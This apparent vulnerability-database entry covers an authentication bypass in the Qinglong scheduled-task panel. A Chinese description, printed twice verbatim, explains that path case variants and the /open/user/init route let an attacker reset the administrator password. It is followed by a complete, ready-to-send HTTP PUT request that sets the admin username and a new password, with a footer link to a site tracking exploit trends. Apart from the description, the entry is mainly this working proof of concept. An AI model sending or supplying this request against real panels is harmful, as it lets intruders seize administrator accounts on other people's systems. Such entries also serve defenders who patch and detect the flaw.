Description
青龙定时任务管理面板存在权限绕过漏洞。攻击者可通过路径大小写变体(如/API/替代/api/)绕过认证访问受保护接口,通过访问 /open/user/init 路径,攻击者可以绕过权限校验机制,后端会将请求重写到 /api/user/init,允许攻击者通过该接口重置管理员密码并获得合法的登录 Token。由于此接口未做有效权限验证,攻击者可通过构造请求直接初始化用户密码,进而登录系统,获得管理员权限。
青龙定时任务管理面板存在权限绕过漏洞。攻击者可通过路径大小写变体(如/API/替代/api/)绕过认证访问受保护接口,通过访问 /open/user/init 路径,攻击者可以绕过权限校验机制,后端会将请求重写到 /api/user/init,允许攻击者通过该接口重置管理员密码并获得合法的登录 Token。由于此接口未做有效权限验证,攻击者可通过构造请求直接初始化用户密码,进而登录系统,获得管理员权限。
PUT /open/user/init HTTP/1.1
Host:
User-Agent: python-requests/2.32.4
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Connection: keep-alive
Content-Length: 47
Content-Type: application/json
{"username": "admin", "password": "qwertyuiop"}
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.